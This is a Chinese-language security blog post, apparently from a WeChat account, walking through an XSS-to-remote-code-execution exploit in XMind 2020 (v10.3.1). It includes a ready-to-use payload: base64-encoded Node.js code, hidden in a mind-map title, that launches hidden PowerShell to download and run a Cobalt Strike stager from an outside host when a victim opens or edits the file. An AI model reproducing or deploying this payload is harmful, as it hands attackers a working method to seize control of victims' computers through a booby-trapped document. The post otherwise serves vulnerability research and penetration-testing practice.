点击上方“蓝字”,关注更多精彩
第三方软件的漏洞之前也发过一些,以后会总结一下。它们有时候可以在内网渗透中达到意想不到的效果。
仔细想想,在办公区,就算是程序员,都不一定会及时更新相关软件,同时他们过度依赖于公司的监控设备和人员,还有过度相信杀软的安全。这就产生了一定的风险。
0x00 前言
这是一个比较老旧的漏洞了,首发于2021年5月最新版的X-Mind
,但是如今内网还是能看到。
Xmind
这个漏洞可以以自定义标题的形式存储恶意代码,当受害者点击或修改自定义标题时,恶意代码将被执行。攻击者可以发送带有恶意代码的.xmind
文件,当该文件被打开时,攻击者能远程控制计算机。
其实看过这两篇文章的师傅们,很快就会理解下面的复现了。
0x01 环境配置
具有该漏洞的X-Mind 2020 (v10.3.1)Win64位安装包下载地址:
https://dl2.xmind.cn/XMind-2020-for-Windows-64bit-10.3.1-202101070032.exe
靶机为windows10机器,关闭杀软(包含Defender)
0x02 本地XSS复现
1、很简单,只需要打开安装好具有漏洞版本的X-Mind,随便选择一个模板。
2、在标题处写上<audio src=x onerror=confirm("test")>
3、然后选择大纲模式编辑这个标题,随便写,甚至我按shift
切换一下中英文都会成功弹窗。
0x03 RCE 上线
1、CS生成一句话上线的powershell
命令,复制出来。
2、放入下面这段代码的相应位置
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.31.84:80/a'))"',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});
3、将上段代码进行base64加密
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==
4、再放入下面这段代码对应base64
加密后的位置
<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>
5、复制出来后直接拼接到一个x-mind
文件的标题处
6、点击大纲,切换一下中英文,或者随便输入个字母或者数字就已经上线了
0x04 总结
1、X-Mind软件基于Node.js
开发,所以此XSS漏洞和之前复现的Clash
、蚁剑漏洞有些类似。
2、第三方软件的漏洞,远比操作系统自带的服务或者软件多得多,而且利用成本更加低。
3、在内网渗透中,我们拿到任意一台机器,不要着急提权或者内网信息收集,先做好本地的信息收集,例如我找到一个.xts
文件,如果你要是知道这是X-shell
终端工具导出配置的文件后缀,你还用得着费尽心思去搭建路由跨网段进行内网渗透吗?还需要本地导出注册表dumphash
然后PTH
吗?渗透的成本会大大降低。
4、渗透测试,不仅仅是只用渗透的技巧,拿到对应的机器,就要化身成对应机器的所有者,去扮演他的角色去渗透,如果他的角色不够用了,再加入我们渗透的技巧与思路。所以有时不要一味去追求高级的操作而忘了基础和基本操作。
0x05 references
https://www.jianshu.com/p/4fd4b2f2dfb5
往期推荐
实战经验 | VPS部署WireGuard与对OpenVPN的补充
郑重声明:该公众号大部分文章来自作者日常工作与学习笔记,也有少数文章是经过原作者授权转载而来,未经授权,严禁转载。如需要,请公众号私信联系作者。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与原作者以及本公众号无关。
原文始发于微信公众号(HACK技术沉淀营):漏洞复现 | X-Mind XSS致使RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论